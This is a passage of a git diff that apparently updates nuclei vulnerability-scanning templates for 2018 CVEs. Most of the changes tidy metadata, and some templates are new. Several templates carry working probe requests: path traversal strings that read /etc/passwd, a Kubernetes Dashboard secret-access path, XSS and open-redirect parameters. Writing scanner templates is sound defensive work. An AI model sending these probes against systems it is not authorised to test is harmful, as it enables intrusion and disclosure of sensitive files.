https://www.exploit-db.com/exploits/45384/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-16671 cwe-id: CWE-200 + tags: cve,cve2018,circarlife,scada,iot,disclosure requests: - method: GET diff --git a/cves/2018/CVE-2018-16716.yaml b/cves/2018/CVE-2018-16716.yaml new file mode 100644 index 0000000000..b74af567f1 --- /dev/null +++ b/cves/2018/CVE-2018-16716.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-16716 + +info: + name: NCBI ToolBox - Directory Traversal + author: 0x_Akoko + severity: critical + description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string. + reference: + - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md + - https://nvd.nist.gov/vuln/detail/CVE-2018-16716 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2018-16716 + cwe-id: CWE-22 + tags: cve,cve2018,ncbi,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/18 diff --git a/cves/2018/CVE-2018-16763.yaml b/cves/2018/CVE-2018-16763.yaml index bcdb226a69..773df02e1e 100644 --- a/cves/2018/CVE-2018-16763.yaml +++ b/cves/2018/CVE-2018-16763.yaml @@ -1,20 +1,21 @@ id: CVE-2018-16763 info: - name: fuelCMS 1.4.1 - Remote Code Execution + name: FUEL CMS 1.4.1 - Remote Code Execution author: pikpikcu severity: critical - tags: cve,cve2018,fuelcms,rce + description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. reference: - https://www.exploit-db.com/exploits/47138 - - https://www.getfuelcms.com/ # Vendor Homepage - - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Software Link + - https://www.getfuelcms.com/ + - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16763 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 - description: "FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. This can lead to Pre-Auth Remote Code Execution." + tags: cve,cve2018,fuelcms,rce requests: - raw: @@ -30,3 +31,5 @@ requests: - type: regex regex: - "root:.*:0:0:" + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-16836.yaml b/cves/2018/CVE-2018-16836.yaml index 0a8102bf1d..87db214d73 100644 --- a/cves/2018/CVE-2018-16836.yaml +++ b/cves/2018/CVE-2018-16836.yaml @@ -1,17 +1,21 @@ id: CVE-2018-16836 info: - name: Rubedo CMS 3.4.0 - Directory Traversal + name: Rubedo CMS <=3.4.0 - Directory Traversal author: 0x_Akoko severity: critical - reference: https://www.exploit-db.com/exploits/45385 - tags: cve,cve2018,rubedo,lfi + description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + reference: + - https://www.exploit-db.com/exploits/45385 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16836 + - https://github.com/maroueneboubakri/CVE/tree/master/rubedo-cms + - https://www.exploit-db.com/exploits/45385/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-16836 cwe-id: CWE-22 - description: "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI." + tags: cve,cve2018,rubedo,lfi requests: - method: GET @@ -22,8 +26,10 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-17246.yaml b/cves/2018/CVE-2018-17246.yaml index c4f12c3f51..e4a5e3b909 100644 --- a/cves/2018/CVE-2018-17246.yaml +++ b/cves/2018/CVE-2018-17246.yaml @@ -1,18 +1,21 @@ id: CVE-2018-17246 + info: - name: Kibana Local File Inclusion + name: Kibana - Local File Inclusion author: princechaddha severity: critical - description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md - tags: cve,cve2018,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 + - https://www.elastic.co/community/security + - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-17246 cwe-id: CWE-829 + tags: cve,cve2018,lfi,kibana requests: - method: GET @@ -36,3 +39,5 @@ requests: - type: status status: - 500 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 4cfc98d6bf..348c3260bf 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -1,19 +1,20 @@ id: CVE-2018-17254 info: - name: Joomla JCK Editor SQL Injection + name: Joomla! JCK Editor SQL Injection author: Suman_Kar - description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: critical - tags: joomla,sqli,cve,cve2018 + description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 + remediation: Update or remove the affected plugin. + tags: joomla,sqli,cve,cve2018 requests: - raw: @@ -27,3 +28,5 @@ requests: part: body words: - "nuclei-template" + +# Enhanced by mp on 2022/02/08 diff --git a/cves/2018/CVE-2018-17422.yaml b/cves/2018/CVE-2018-17422.yaml new file mode 100644 index 0000000000..e9c70f056b --- /dev/null +++ b/cves/2018/CVE-2018-17422.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-17422 + +info: + name: dotCMS < 5.0.2 - Open Redirect + author: 0x_Akoko,daffainfo + severity: medium + description: | + dotCMS before 5.0.2 has open redirects via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. + reference: + - https://github.com/dotCMS/core/issues/15286 + - https://www.cvedetails.com/cve/CVE-2018-17422 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-17422 + cwe-id: CWE-601 + metadata: + shodan-query: http.title:"dotCMS" + verified: "true" + tags: cve,cve2018,redirect,dotcms + +requests: + - method: GET + path: + - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com' + - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com' + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "self.location = 'http://www.example.com'" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-17431.yaml b/cves/2018/CVE-2018-17431.yaml index ab6e84abda..d8175df08e 100644 --- a/cves/2018/CVE-2018-17431.yaml +++ b/cves/2018/CVE-2018-17431.yaml @@ -1,19 +1,21 @@ id: CVE-2018-17431 info: - name: Comodo Unified Threat Management Web Console 2.7.0 - RCE + name: Comodo Unified Threat Management Web Console - Remote Code Execution author: dwisiswant0 severity: critical - description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based) - tags: cve,cve2018,comodo,rce + description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 + - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 + - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 + tags: cve,cve2018,comodo,rce requests: - raw: @@ -35,4 +37,6 @@ requests: part: body - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-18069.yaml b/cves/2018/CVE-2018-18069.yaml index eab47b98dc..1a56c2d92d 100644 --- a/cves/2018/CVE-2018-18069.yaml +++ b/cves/2018/CVE-2018-18069.yaml @@ -1,27 +1,37 @@ id: CVE-2018-18069 info: - name: Wordpress unauthenticated stored xss + name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting author: nadino severity: medium - description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. - tags: cve,cve2018,wordpress,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-18069 - cwe-id: CWE-79 + description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php + request to wp-admin/admin.php. reference: - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18069 + cwe-id: CWE-79 + tags: cve,cve2018,wordpress,xss,plugin requests: - method: POST path: - "{{BaseURL}}/wp-admin/admin.php" - body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN">' - redirects: true + body: | + icl_post_action=save_theme_localization&locale_file_name_en=EN"> + + redirects: true + max-redirects: 2 matchers: - type: dsl dsl: - - 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\">")' + - 'contains(tolower(all_headers), "text/html")' + - 'contains(set_cookie, "_icl_current_admin_language")' + - 'contains(body, "\">")' + condition: and + +# Enhanced by mp on 2022/04/08 diff --git a/cves/2018/CVE-2018-18264.yaml b/cves/2018/CVE-2018-18264.yaml new file mode 100644 index 0000000000..7d14a28bf0 --- /dev/null +++ b/cves/2018/CVE-2018-18264.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-18264 + +info: + name: Kubernetes Dashboard unauthenticated secret access + author: edoardottt + severity: high + description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3289 + - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ + - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-18264 + cwe-id: CWE-306 + metadata: + shodan-query: product:"Kubernetes" + tags: cve,cve2018,kubernetes,k8s,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: dsl + dsl: + - 'contains(body, "apiVersion") && contains(body, "objectRef")' \ No newline at end of file diff --git a/cves/2018/CVE-2018-18323.yaml b/cves/2018/CVE-2018-18323.yaml index e214ec632c..0161cdc19f 100644 --- a/cves/2018/CVE-2018-18323.yaml +++ b/cves/2018/CVE-2018-18323.yaml @@ -1,4 +1,5 @@ id: CVE-2018-18323 + info: name: Centos Web Panel 0.9.8.480 LFI author: 0x_Akoko @@ -8,6 +9,7 @@ info: - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html - http://centos-webpanel.com/ - https://www.cvedetails.com/cve/CVE-2018-18323 + - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/cves/2018/CVE-2018-18570.yaml b/cves/2018/CVE-2018-18570.yaml index 51249a06a8..dc4cb72724 100644 --- a/cves/2018/CVE-2018-18570.yaml +++ b/cves/2018/CVE-2018-18570.yaml @@ -1,4 +1,5 @@ id: CVE-2018-18570 + info: name: Cross-Site Scripting on Planon web application author: emadshanab @@ -7,12 +8,12 @@ info: reference: - https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-18570 - tags: xss,cve,cve2018,planon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-18570 cwe-id: CWE-79 + tags: xss,cve,cve2018,planon requests: - method: GET diff --git a/cves/2018/CVE-2018-18608.yaml b/cves/2018/CVE-2018-18608.yaml new file mode 100644 index 0000000000..945f316407 --- /dev/null +++ b/cves/2018/CVE-2018-18608.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-18608 + +info: + name: DedeCMS V5.7 - Cross Site Scripting + author: ritikchaddha + severity: medium + description: | + DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php. + reference: + - https://github.com/ky-j/dedecms/issues/8 + - https://nvd.nist.gov/vuln/detail/CVE-2018-18608 + - https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-18608 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:"DedeCms" + verified: "true" + tags: dedecms,xss,cve,cve2018 + +requests: + - method: GET + path: + - "{{BaseURL}}/plus/feedback.php/rp4hu%27>")' + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-19326.yaml b/cves/2018/CVE-2018-19326.yaml new file mode 100644 index 0000000000..3011969d59 --- /dev/null +++ b/cves/2018/CVE-2018-19326.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-19326 + +info: + name: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal + author: 0x_Akoko + severity: high + description: The vulnerability exists due to path traversal, as demonstrated by reading /etc/passwd. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attack and view arbitrary files. + reference: + - https://www.exploit-db.com/exploits/45904 + - https://www.cybersecurity-help.cz/vdb/SB2018120309 + - https://www.zyxel.com/homepage.shtml + - https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-19326 + cwe-id: CWE-22 + metadata: + shodan-query: http.html:"VMG1312-B10D" + verified: true + tags: cve,cve2018,zyxel,lfi,modem,router + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" diff --git a/cves/2018/CVE-2018-19365.yaml b/cves/2018/CVE-2018-19365.yaml new file mode 100644 index 0000000000..b27127cfd2 --- /dev/null +++ b/cves/2018/CVE-2018-19365.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-19365 + +info: + name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal + author: 0x_Akoko + severity: high + description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API. + reference: + - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html + - https://www.cvedetails.com/cve/CVE-2018-19365 + - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-19365 + cwe-id: CWE-22 + tags: cve,cve2018,wowza,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/cves/2018/CVE-2018-19386.yaml b/cves/2018/CVE-2018-19386.yaml index 1d426ddfe2..d4d33eccb1 100644 --- a/cves/2018/CVE-2018-19386.yaml +++ b/cves/2018/CVE-2018-19386.yaml @@ -4,14 +4,17 @@ info: name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting author: pikpikcu severity: medium - reference: https://www.cvedetails.com/cve/CVE-2018-19386/ - tags: cve,cve2018,solarwinds,xss + description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. + reference: + - https://www.cvedetails.com/cve/CVE-2018-19386/ + - https://i.imgur.com/Y7t2AD6.png + - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-19386 cwe-id: CWE-79 - description: "SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI." + tags: cve,cve2018,solarwinds,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-19439.yaml b/cves/2018/CVE-2018-19439.yaml index ba2f295d30..d95e49bf11 100644 --- a/cves/2018/CVE-2018-19439.yaml +++ b/cves/2018/CVE-2018-19439.yaml @@ -5,16 +5,16 @@ info: author: madrobot,dwisiswant0 severity: medium description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4) - tags: cve,cve2018,oracle,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-19439 - cwe-id: CWE-79 reference: - http://www.securityfocus.com/bid/106006 - http://seclists.org/fulldisclosure/2018/Nov/58 - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19439 + cwe-id: CWE-79 + tags: cve,cve2018,oracle,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-19458.yaml b/cves/2018/CVE-2018-19458.yaml index 8bfc61e40a..1efd4f5fbc 100644 --- a/cves/2018/CVE-2018-19458.yaml +++ b/cves/2018/CVE-2018-19458.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/45780 - https://www.cvedetails.com/cve/CVE-2018-19458 - tags: cve,cve2018,lfi + - https://www.exploit-db.com/exploits/45780/ + - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-19458 cwe-id: CWE-287 + tags: cve,cve2018,lfi,proxy requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-19753.yaml b/cves/2018/CVE-2018-19753.yaml index 0af644b43a..1fc3ca7ca6 100644 --- a/cves/2018/CVE-2018-19753.yaml +++ b/cves/2018/CVE-2018-19753.yaml @@ -1,4 +1,5 @@ id: CVE-2018-19753 + info: name: Tarantella Enterprise Directory Traversal author: 0x_Akoko @@ -7,6 +8,8 @@ info: reference: - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html - https://www.cvedetails.com/cve/CVE-2018-19753 + - http://seclists.org/fulldisclosure/2018/Nov/66 + - http://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index fa78623265..2d0cfd55cd 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -5,13 +5,16 @@ info: author: daffainfo severity: medium description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 - tags: cve,cve2018,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-20462 + - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS + - https://wpvulndb.com/vulnerabilities/9196 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-20462 cwe-id: CWE-79 + tags: cve,cve2018,wordpress,xss,wp-plugin requests: - method: GET diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml index 15ee6fd76f..5d89cd2d44 100644 --- a/cves/2018/CVE-2018-20470.yaml +++ b/cves/2018/CVE-2018-20470.yaml @@ -8,12 +8,13 @@ info: reference: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://www.cvedetails.com/cve/CVE-2018-20470 - tags: cve,cve2018,lfi + - http://packetstormsecurity.com/files/153330/Sahi-Pro-7.x-8.x-Directory-Traversal.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-20470 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET diff --git a/cves/2018/CVE-2018-20824.yaml b/cves/2018/CVE-2018-20824.yaml index 174487aad6..2e75d666fc 100644 --- a/cves/2018/CVE-2018-20824.yaml +++ b/cves/2018/CVE-2018-20824.yaml @@ -5,14 +5,14 @@ info: author: madrobot,dwisiswant0 severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter. - tags: cve,cve2018,atlassian,jira,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-20824 - cwe-id: CWE-79 reference: - https://jira.atlassian.com/browse/JRASERVER-69238 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-20824 + cwe-id: CWE-79 + tags: cve,cve2018,atlassian,jira,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index 9158d407cd..71ed01c5b8 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -1,19 +1,20 @@ id: CVE-2018-20985 info: - name: WordPress Plugin WP Payeezy Pay 2.97 - Local File Inclusion + name: WordPress Payeezy Pay <=2.97 - Local File Inclusion author: daffainfo + severity: critical description: WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected. reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ + - https://wordpress.org/plugins/wp-payeezy-pay/#developers - https://www.cvedetails.com/cve/CVE-2018-20985/ - severity: critical - tags: cve,cve2018,wordpress,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-20985 cwe-id: CWE-20 + tags: cve,cve2018,wordpress,lfi,plugin requests: - method: POST @@ -34,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/13 diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml index 448abf9d82..920686afb2 100644 --- a/cves/2018/CVE-2018-2392.yaml +++ b/cves/2018/CVE-2018-2392.yaml @@ -4,7 +4,6 @@ info: name: SAP Internet Graphics Server (IGS) XML External Entity author: _generic_human_ severity: high - tags: cve,cve2018,sap,igs,xxe,xmlchart description: | SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. reference: @@ -15,9 +14,10 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-2392 cwe-id: CWE-611 + tags: cve,cve2018,sap,igs,xxe,xmlchart requests: - raw: diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml index 86e858609d..4fcb606989 100644 --- a/cves/2018/CVE-2018-2628.yaml +++ b/cves/2018/CVE-2018-2628.yaml @@ -1,17 +1,22 @@ id: CVE-2018-2628 info: - name: Oracle WebLogic Server Deserialization RCE + name: Oracle WebLogic Server Deserialization - Remote Code Execution author: milo2012 severity: critical - reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 - tags: cve,cve2018,oracle,weblogic,network + description: | + The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contains an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server. + reference: + - https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 + - https://nvd.nist.gov/vuln/detail/CVE-2018-2628 + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.securitytracker.com/id/1040696 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-2628 cwe-id: CWE-502 - description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions 